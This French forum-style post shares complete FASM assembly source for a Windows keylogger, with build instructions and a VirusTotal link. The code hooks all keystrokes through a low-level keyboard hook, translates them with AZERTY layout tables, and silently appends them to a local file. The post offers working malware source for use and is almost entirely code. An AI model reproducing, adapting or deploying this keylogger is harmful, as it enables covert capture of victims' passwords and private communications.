Voici un keylogger tout simple que j'ai créé il y a environ 6ans.
Il logue tout dans le répertoire courant dans un fichier qui s'appelle "file"
Si vous voulez qu'il s'appelle autrement, modifiez le dans le code.
Le code est à mettre dans un fichier.asm et à compiler avec Fasm.
Virus total: https://www.virustotal.com/#/file/ca7b0f.../detection
Il logue tout dans le répertoire courant dans un fichier qui s'appelle "file"
Si vous voulez qu'il s'appelle autrement, modifiez le dans le code.
Le code est à mettre dans un fichier.asm et à compiler avec Fasm.
Virus total: https://www.virustotal.com/#/file/ca7b0f.../detection
Code :
format PE GUI 4.0
include 'include/windows/win32a.inc'
;--------------------------------------------------
section '.flat' readable writeable executable
;--------------------------------------------------
entry Injection
proc Injection
invoke GetModuleHandle,0
or eax,eax
jz exit
invoke SetWindowsHookEx,WH_KEYBOARD_LL,Keyhook,eax,0
mov [HHOOK],eax
@@:
invoke GetMessage,msg,NULL,0,0
or eax,eax
jz @f
invoke TranslateMessage,msg
invoke DispatchMessage,msg
jmp @b
@@:
invoke UnhookWindowsHookEx,[HHOOK]
ret
endp
proc Keyhook nCode,wParam,lParam
cmp [nCode],HC_ACTION
jnz callnexthook
cmp [wParam],WM_SYSKEYDOWN
jz @f
cmp [wParam],WM_KEYDOWN
jnz callnexthook
@@:
mov eax,[lParam]
virtual at eax
_vkCode dd ?
_scanCode dd ?
_flags dd ?
_time dd ?
_dwExtraInfo dd ?
end virtual
mov eax,[_vkCode]
mov [vkCode],eax
mov esi,lowercase
invoke GetKeyState,0xa5
cmp ah,0xff
jnz @f
mov esi,altgrcase
@@:
invoke GetKeyState,0xa0
cmp ah,0xff
jz @f
invoke GetKeyState,0xa1
cmp ah,0xff
jz @f
invoke GetKeyState,0x14
cmp ax,0x0001
jnz Keyscan
@@:
mov esi,uppercase
Keyscan:
mov eax,[vkCode]
mov edi,vkcode
xor ecx,ecx
add cl,63
cld
repne scasb
or cl,cl
jz callnexthook
sub cl,63
not cl
add si,cx
lodsb
mov [writebuf],al
invoke CreateFile,FilePath1,GENERIC_WRITE,NULL,NULL,\
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov [hFile1],eax
invoke SetFilePointer,[hFile1],0,0,FILE_END
invoke WriteFile,[hFile1],writebuf,0x1,BytesWrite,NULL
invoke CloseHandle,[hFile1]
callnexthook:
invoke CallNextHookEx,[HHOOK],[wParam],[lParam]
ret
endp
exit:
invoke ExitProcess,0
;-----------------------|data|-------------------------
msg MSG
dwthread dd 0
HHOOK dd 0
vkCode dd 0
cmpt rd 1
FilePath1 db 'file',0
hFile1 dd 0
writebuf rb 5
BytesWrite dd 0
altgrcase db 0x00,0x00,0xa4,0x00,0x00,0x00,0x00,0x00,\
0x00,0x7d,0x5d,0x00,0x23,0x7b,0x5b,0x7c,\
0x5c,0x7e,0x60,0x5e,0x40,0
uppercase db 0x0a,0x20,0xa3,0x25,0xb5,0x3f,0x2e,0x2f,\
0xa7,0x2b,0xb0,0x31,0x33,0x34,0x35,0x36,\
0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x30,\
0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0
lowercase db 0x0a,0x20,0x24,0xf9,0x2a,0x2c,0x3b,0x3a,\
0x21,0x3d,0x29,0x26,0x22,0x27,0x28,0x2d,\
0x5f,0xe9,0xe8,0xe7,0xe0,0x61,0x62,0x63,\
0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x6b,\
0x6c,0x6d,0x6e,0x6f,0x70,0x71,0x72,0x73,\
0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x30,\
0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0
vkcode db 0x0d,0x20,0xba,0xc0,0xdc,0xbc,0xbe,0xbf,\
0xdf,0xbb,0xdb,0x31,0x33,0x34,0x35,0x36,\
0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x60,\
0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,\
0x69,0x6a,0x6b,0x6d,0x6e,0x6f,0
;------------------------|idata|-------------------------
data import
library kernel32, 'kernel32.dll',\
msvcrt, 'msvcrt.dll',\
user32, 'user32.dll',\
wsock32, 'Ws2_32.dll'
include 'include/windows/api/kernel32.inc'
include 'include/windows/api/user32.inc'
include 'include/windows/api/wsock32.inc'
import msvcrt,\
clock, 'clock',\
printf, 'printf',\
sprintf, 'sprintf'
end data